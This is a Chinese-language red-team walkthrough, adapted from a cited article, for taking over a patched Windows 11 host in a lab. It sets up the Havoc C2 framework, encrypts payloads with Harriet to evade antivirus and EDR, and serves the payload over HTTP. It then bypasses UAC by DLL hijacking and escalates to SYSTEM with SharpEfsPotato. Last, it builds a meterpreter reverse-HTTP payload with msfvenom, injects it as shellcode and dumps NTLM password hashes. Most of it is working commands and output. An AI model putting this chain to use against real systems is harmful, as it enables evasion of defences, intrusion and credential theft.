1、环境配置
Windows11 更新到最新补丁(文章编写时间:2023年8月),安全软件打开
Kali更新:
apt update -y && apt upgrade -y
安装设置Havoc
//下载项目
cd /opt && git clone https://github.com/HavocFramework/Havoc.git
//安装依赖包
sudo apt install -y git build-essential apt-utils cmake libfontconfig1 libglu1-mesa-dev libgtest-dev libspdlog-dev libboost-all-dev libncurses5-dev libgdbm-dev libssl-dev libreadline-dev libffi-dev libsqlite3-dev libbz2-dev mesa-common-dev qtbase5-dev qtchooser qt5-qmake qtbase5-dev-tools libqt5websockets5 libqt5websockets5-dev qtdeclarative5-dev golang-go qtbase5-dev libqt5websockets5-dev libspdlog-dev python3-dev libboost-all-dev mingw-w64 nasm
构建服务端:
cd /opt/Havoc/teamserver
go mod download golang.org/x/sys
go mod download github.com/ugorji/go
cd ..
make ts-build
启动服务端:
./havoc server --profile ./profiles/havoc.yaotl
构建客户端:
make client-build
启动客户端:
./havoc client
单击“新建配置文件”使用默认凭据登录:“5spider:password1234”。
# 2、设置监听
点击View---Listeners
点击底部的Add
设置新的监听器
# 3、生成payload
点击Attack-->Payload
选择监听器,设置系统架构和格式,然后点击Generate
保存生成的Payload文件
# 4、使用Harriet框架处理Payload绕过 AV/EDR
git clone https://github.com/assume-breach/Home-Grown-Red-Team.git
cd Home-Grown-Red-Team/Harriet
sudo bash setup.sh
bash Harriet.sh
选择第一个 Create FUD EXE
然后选择1. Fully-Automated AES Encryption (全自动AES加密)
设置Shellcode文件路径
输入生成的名字
Crypto 解决 pip install pycryptodome
将文件复制到一个新的目录
─$ ls
DLL.sh EXE.sh Harriet Harriet.sh README.md setup.sh win11.exe
┌──(kali㉿kali)-[~/Home-Grown-Red-Team/Harriet]
└─$ mkdir web
┌──(kali㉿kali)-[~/Home-Grown-Red-Team/Harriet]
└─$ cp win11.exe web/
启动一个HTTP服务,方便Windows 11上访问和下载这个文件
└─$ cd web
┌──(kali㉿kali)-[~/Home-Grown-Red-Team/Harriet/web]
└─$ python3 -m http.server 8080
Serving HTTP on 0.0.0.0 port 8080 (http://0.0.0.0:8080/) ...
# 5、模拟上线
在windows 11下载文件,并运行
# 6、获得会话
右键选择Interact 打开C2命令行窗口
# 7、枚举
使用SharpUp脚本枚举提权向量。
git clone https://github.com/r3motecontrol/Ghostpack-CompiledBinaries.git
通过dotnet命令在 Havoc 会话的内存中运行它。
dotnet inline-execute /home/kali/SharpUp.exe audit
命令完成后,我们看到该用户是本地管理员!如果我们能绕过UAC,就可以获得一个高权限完整的反向 shell。
# 8、使用 DLL 劫持绕过Win 11 UAC
使用HighBorn脚本,生成恶意 DLL。在 HighBorn 目录中,打开 HighBorn.c 文件。
把可执行文件替换为我们自己的路径
在havoc中执行pwd获取文件路径
保存文件,然后编译它
sudo x86_64-w64-mingw32-gcc -shared -o secur32.dll HighBorn.c -lcomctl32 -Wl,-subsystem,windows
需要使用HighBorn.exe bypass UAC ,在HighBorn目录中,我们可以使用基于Linux的C#编译器Mono-Complete编译它
sudo apt install mono-complete -y
mcs -out:HighBorn.exe HighBorn.cs
编译之前,修改
HighBorn.cs中的dll下载地址
在内存中运行 UAC Bypass
dotnet inline-execute /home/kali/HighBorn.exe
然后回收到一个新的shell
查看当前用户权限
现在我们有一个高完整性信标, 我们可以使用 SharpEfsPotato 工具来获取system权限.你必须在Visual Studio上编译SharpEfsPotato。这是 git 链接。https://github.com/bugch3ck/SharpEfsPotato.git
编译完成后,在Havoc C2 会话内存中执行,使用-p指定二进制文件的位置
dotnet inline-execute /home/kali/SharpEfsPotato.exe -p C:\Users\jack\Downloads\win11.exe
提权成功,获得一个system权限的shell
# 9、利用Metasploit进行后渗透
通过注入一个meterpreter会话,进行hash转储。
msfvenom -p windows/x64/meterpreter_reverse_http LHOST=192.168.10.140 LPORT=7777 -f raw > /home/kali/output.bin
用Harriet处理payload
使用donut转为shellcode
git clone http://github.com/thewover/donut.git
cd donut
make
./donut -i ./msfpayload.exe
[ Donut shellcode generator v1 (built Aug 19 2023 14:35:50)
[ Copyright (c) 2019-2021 TheWover, Odzhan
[ Instance type : Embedded
[ Module file : "./msfpayload.exe"
[ Entropy : Random names + Encryption
[ File type : EXE
[ Target CPU : x86+amd64
[ AMSI/WDLP/ETW : continue
[ PE Headers : overwrite
[ Shellcode : "loader.bin"
[ Exit : Thread
cp loader.bin ~/msf.bin
启动msfconsole ,设置监听
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
smsf6 exploit(multi/handler) > set payload windows/x64/meterpreter_reverse_http
payload => windows/x64/meterpreter_reverse_http
msf6 exploit(multi/handler) > set LHOST 192.168.10.140
LHOST => 192.168.10.140
msf6 exploit(multi/handler) > set LPORT 7777
LPORT => 7777
msf6 exploit(multi/handler) > run -j
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.
msf6 exploit(multi/handler) >
[*] Started HTTP reverse handler on http://192.168.10.140:7777
通过Havoc注入shellcode
shellcode inject x64 PID# /home/kali/msf.bin
shellcode inject x64 844 /home/kali/msf.bin
利用后渗透模块dump 用户hash
msf6 exploit(multi/handler) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x64/windows NT AUTHORITY\SYSTEM @ WIN11- 192.168.10.140:7777 -> 192.16
PC 8.10.180:50480 (192.168.10.18
0)
msf6 exploit(multi/handler) > sessions 1
[*] Starting interaction with 1...
meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(multi/handler) > use post/windows/gather/hashdump
msf6 post(windows/gather/hashdump) > set session 1
session => 1
msf6 post(windows/gather/hashdump) > exploit
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 1043c5689d3d7d604d0209dbd3ad9ee8...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hints...
No users with password hints on this system
[*] Dumping password hashes...
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:15e6c614c133e20a3e62994373849dee:::
jack:1001:aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::
[*] Post module execution completed
参考文章:https://assume-breach.medium.com/home-grown-red-team-getting-system-on-windows-11-with-havoc-c2-cc4bb089d22
